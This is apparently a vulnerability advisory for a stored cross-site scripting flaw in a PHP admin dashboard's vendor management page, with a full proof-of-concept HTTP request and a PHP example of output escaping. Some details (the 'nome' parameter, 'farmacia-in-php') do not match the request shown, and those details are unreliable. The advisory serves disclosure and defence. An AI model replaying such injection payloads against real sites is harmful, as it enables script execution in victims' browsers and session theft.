# admin-dashboard-in-php has Cross Site Scripting vulnerability in vendor_management.php

## supplier

https://code-projects.org/admin-dashboard-in-php-with-source-code/

## describe

In vendor_management.php there are unrestricted cross site scripting attacks and injection attacks in the farmacia-in-php. The controllable parameter is the nome parameter. This function passes the user-supplied parameter into the echo statement without any restriction. A malicious attacker can exploit this vulnerability to obtain sensitive information from clients.

## Code analysis

![image](https://hackmd.io/_uploads/HyyXD0WE1e.png)

![image](https://hackmd.io/_uploads/SyZFPCb4Jx.png)

The data is queried from the database and echoed out directly without any filtering or escaping, so a stored XSS payload is executed by the browser of whoever views the page.

## payload

```
POST /manage_vendor_management.php?id=10 HTTP/1.1
Host: 192.168.0.143
Content-Length: 581
Cache-Control: max-age=0
Accept-Language: en-US
Upgrade-Insecure-Requests: 1
Origin: http://192.168.0.143
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarych1t3gqxdF9mynkp
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.0.143/manage_vendor_management.php?id=10
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=d1jciqajn87pvfbeddsdhi29rf
Connection: keep-alive

------WebKitFormBoundarych1t3gqxdF9mynkp
Content-Disposition: form-data; name="username"

<script>alert(1)</script>
------WebKitFormBoundarych1t3gqxdF9mynkp
Content-Disposition: form-data; name="password"

Pandey
------WebKitFormBoundarych1t3gqxdF9mynkp
Content-Disposition: form-data; name="email"

shivangi050mca20@igdtuw.ac.in
------WebKitFormBoundarych1t3gqxdF9mynkp
Content-Disposition: form-data; name="mobile"

123456789
------WebKitFormBoundarych1t3gqxdF9mynkp
Content-Disposition: form-data; name="submit"


------WebKitFormBoundarych1t3gqxdF9mynkp--
```

## result

![image](https://hackmd.io/_uploads/HJmbuRZ4yl.png)
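As an added example (not the project's own code), the following PHP contrasts the vulnerable pattern described above, a database value dropped straight into an echo statement, with the same row rendered through an output-escaping helper. The column names, the sample row and the function names are assumptions made for the illustration.

```php
<?php
// Added example, not code from admin-dashboard-in-php. The row layout, column
// names and function names are assumptions. It shows why the stored username
// from the report executes as script, and how output escaping neutralises it.

// Constructed sample row, standing in for the vendor record that the
// multipart POST in the report stored verbatim in the database.
$vendor = [
    'id'       => 10,
    'username' => '<script>alert(1)</script>',
    'email'    => 'vendor@example.invalid',
];

// Vulnerable pattern (the defect in the report): the raw database value is
// concatenated into HTML, so the browser parses the stored string as markup
// and runs the script tag every time the page is viewed.
function renderVendorRowUnsafe(array $row): string
{
    return '<tr><td>' . $row['id'] . '</td>'
         . '<td>' . $row['username'] . '</td>'
         . '<td>' . $row['email'] . '</td></tr>';
}

// Hardened pattern: escape every untrusted value for the HTML context at the
// point of output. ENT_QUOTES also escapes single quotes, so the same helper is
// safe inside quoted attributes; ENT_SUBSTITUTE keeps invalid UTF-8 from
// silently emptying the string; an explicit charset avoids encoding confusion.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function renderVendorRowSafe(array $row): string
{
    return '<tr><td>' . h((string) $row['id']) . '</td>'
         . '<td>' . h($row['username']) . '</td>'
         . '<td>' . h($row['email']) . '</td></tr>';
}

// The first line contains a live <script> element; in the second the same
// payload is emitted as &lt;script&gt;...&lt;/script&gt; and displays as text.
echo renderVendorRowUnsafe($vendor), PHP_EOL;
echo renderVendorRowSafe($vendor), PHP_EOL;
```

Escaping belongs at the output site rather than on the way into the database, so the stored value stays intact for other consumers and every template that echoes it is protected the same way.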